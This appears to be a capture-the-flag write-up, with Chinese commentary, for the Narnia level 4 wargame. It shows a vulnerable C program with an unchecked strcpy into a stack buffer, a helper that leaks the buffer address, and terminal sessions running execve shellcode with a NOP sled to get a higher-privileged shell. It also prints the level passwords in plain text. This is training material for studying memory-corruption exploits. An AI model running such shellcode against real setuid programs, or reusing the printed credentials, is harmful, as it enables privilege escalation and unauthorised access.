/** narnia4.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
extern char **environ;
int main(int argc,char **argv){
int i;
char buffer[256];
for(i = 0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
if(argc>1)
strcpy(buffer,argv[1]);
return 0;
}
/** nar.c */
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
extern char **environ;
int main(int argc,char **argv){
int i;
char buffer[256];
printf("%p\n", buffer);
for(i = 0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
if(argc>1)
strcpy(buffer,argv[1]);
return 0;
}
棧環境
要把shellcode放在buffer中, 但是不知道buffer的地址, 用nar.c計算出buffer的地址
narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit
通過測試我們知道當可執行程序爲 ./nar 時, buffer的地址爲0xffffd3dc
那我們可以計算出當可執行程序爲 /narnia/narnia4 時,buffer的地址爲 0xffffd3dc
計算過程如下:
./nar 的長度爲5個字節, 根據narnia2瞭解到, 在環境變量之前有兩個字段與argv[0]有關, 那麼長度爲10字節, 在main函數中有16字節對齊, 那麼就是16字節
/narnia/narnia4長度是15字節, 在環境變量之前有兩個字段與argv[0]有關, 那麼長度爲30字節, 在main函數中有16字節對齊, 那麼就是32字節
這樣就可以知道 以./nar 運行的程序的buffer地址 比 以/narnia/narnia4運行的程序的buffer地址 大16字節
那麼以/narnia/narnia4運行的程序的buffer地址爲 0xffffd3cc
root@yangq:~# ssh [email protected]
[email protected]'s password: thaenohtai
narnia4@melinda:~$ cd /tmp/shadowcoder4
narnia4@melinda:/tmp/shadowcoder4$ ls
nar nar.c narnia4 narnia4.c sleep.sh
narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit
narnia4@melinda:/tmp/shadowcoder4$ /narnia/narnia4 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xcc\xd3\xff\xff"'`
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy
$